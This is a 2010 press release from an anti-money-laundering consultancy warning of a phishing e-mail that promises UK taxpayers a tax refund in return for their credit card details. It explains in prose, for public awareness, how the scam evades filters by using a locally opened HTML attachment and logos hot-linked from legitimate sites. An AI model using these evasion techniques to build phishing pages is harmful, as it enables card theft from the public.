London, England. 2010 03 16 02:45 - immediate release

Internet fraud collects credit card information from UK taxpayers; potential for massive credit card losses.

The Anti Money Laundering Network has this morning learned of a sophisticated e-mail fraud designed to collect credit card numbers from UK taxpayers who are promised a tax refund if they confirm their names, addresses and full credit card information including the security number.

The Anti Money Laundering Network has published details of the fraud at www.chiefofficers.net.

In summary: it uses a web coding technique called "in line images" to copy logos from real websites and copies them to a fake web page. This is not new: Nigel Morris-Cotterill, Head, The Anti Money Laundering Network said "I demonstrated this technique to bankers in 1997, and although the technology was not new, the use of it in fraudulent websites was rare. I also demonstrated it to BBC for inclusion in a TV programme and in less than five minutes produced a fake website pretending to be that of a UK bank - the BBC lawyers blocked transmission! And, of course, I explained it in How Not To Be A Money Launderer in 1999. Since then, and with the advent of so-called "rich text" e-mail - that is e-mail that looks like and in fact is a webpage - the technique has become part of the stock-in-trade of internet fraudsters."

But what makes this particular fraud different is that it draws in graphics and other links from many different websites, some very large, meaning that the links cannot be quickly and easily blocked. The fraud will therefore have a longer "shelf-life" than usual internet frauds. Adding to that lifespan is another unusual technique: the fraudulent webpage is not linked from code in the mail itself - it is in a simple, and non-malicious, web page attached to the mail.

Morris-Cotterill says that this has three consequences:

"First, because the mail does not contain links, it bypasses one of the primary methods of identifying such scams.

"Secondly, because the form opens and is completed on the victim's own PC, there is no "redundant" traffic to the collecting website which means that its logs do not spike, arousing suspicion.

"Third, because the form opens locally, spam-site filters set in anti-virus packages or web browsers will not identify it as a fake web site."

Sites from which graphics are imported are PayPalObjects.com - a site where PayPal keeps its own content which is imported, using inline techniques, to its own webpages and RBSWorldPay.Com and two UK Revenue websites plus internet shopping site argos.co.uk. It also opens pages on the HM Revenue and Customs and Inland Revenue websites which are in the https or secure zone thereby creating the false impression that the form is part of the HMRC web-system.

The success of the scheme relies on two things: first that people will fill in a form if they are getting free stuff - in this case a tax refund; second that once the page is open in a browser, many users will not differentiate between a locally opened page and a page opened from the world wide web.

The fraud is very likely to be successful - much more so than many other scams to collect credit card information.

The risk to credit card companies, internet merchants and banks is potentially substantial. Credit card issuers may choose to argue that users voluntarily gave their details to the fraudster or may argue that, because the form was completed locally, it falls outside the protection some card issuers provide for victims of fake websites.

Contact: www.antimoneylaundering.net
The Anti Money Laundering Network: Global Response Centre
Kuala Lumpur (GMT +8) +6 03 2078 9152

About:
The Anti Money Laundering Network is a leading international Group comprising risk management and compliance consultancy, information services, training and e-learning, high-level Fora and The Society of Anti Money Laundering Professionals. How not to be a money launderer is now available in a special reprint for Kindle available from Amazon.com at http://www.amazon.com/How-Money-Launderer-e-reprint-ebook/dp/B0037Z6K5O/...